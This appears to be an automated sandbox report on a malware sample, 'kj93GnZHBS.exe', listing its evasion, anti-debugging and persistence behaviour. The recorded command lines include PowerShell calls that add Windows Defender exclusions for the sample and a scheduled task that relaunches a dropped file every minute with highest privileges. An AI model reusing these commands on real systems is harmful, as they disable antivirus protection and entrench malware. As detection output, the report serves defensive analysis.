                            Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOX

                            Malware Analysis System Evasion

                            barindex
                            Source: Yara matchFile source: kj93GnZHBS.exe, type: SAMPLE
                            Source: Yara matchFile source: 0.0.kj93GnZHBS.exe.410000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000000.00000000.2006908730.0000000000412000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: kj93GnZHBS.exe PID: 728, type: MEMORYSTR
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\system log, type: DROPPED
                            Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                            Source: kj93GnZHBS.exe, 00000000.00000002.3270260103.0000000002721000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                            Source: kj93GnZHBS.exe, system log.0.drBinary or memory string: SBIEDLL.DLLINFO
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeMemory allocated: 950000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeMemory allocated: 1A720000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\system logMemory allocated: 6F0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Local\Temp\system logMemory allocated: 1A280000 memory reserve | memory write watch
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Local\Temp\system logThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7313Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2464Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7867Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1734Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7855Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1560Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7720
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1917
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exe TID: 5464Thread sleep time: -75000s >= -30000sJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6184Thread sleep time: -5534023222112862s >= -30000sJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1292Thread sleep count: 7867 > 30Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1292Thread sleep count: 1734 > 30Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6716Thread sleep time: -5534023222112862s >= -30000sJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6696Thread sleep count: 7855 > 30Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6696Thread sleep count: 1560 > 30Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6020Thread sleep time: -7378697629483816s >= -30000sJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3652Thread sleep time: -2767011611056431s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\system log TID: 5652Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\svchost.exe TID: 5248Thread sleep time: -30000s >= -30000s
                            Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\system logFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Local\Temp\system logThread delayed: delay time: 922337203685477
                            Source: system log.0.drBinary or memory string: vmware
                            Source: svchost.exe, 00000011.00000002.3267997293.000001FE85655000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.3265841488.000001FE8002B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                            Source: kj93GnZHBS.exe, 00000000.00000002.3277637971.000000001B5D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeProcess information queried: ProcessInformationJump to behavior

                            Anti Debugging

                            barindex
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeCode function: 0_2_00007FF848E67200 CheckRemoteDebuggerPresent,0_2_00007FF848E67200
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeProcess queried: DebugPortJump to behavior
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Users\user\AppData\Local\Temp\system logProcess token adjusted: Debug
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeMemory allocated: page read and write | page guardJump to behavior

                            HIPS / PFW / Operating System Protection Evasion

                            barindex
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\kj93GnZHBS.exe'
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\system log'
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\kj93GnZHBS.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\system log'Jump to behavior
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\kj93GnZHBS.exe'
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\kj93GnZHBS.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'kj93GnZHBS.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\system log'Jump to behavior
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'system log'Jump to behavior
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "system log" /tr "C:\Users\user\AppData\Local\Temp\system log"Jump to behavior
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeQueries volume information: C:\Users\user\Desktop\kj93GnZHBS.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
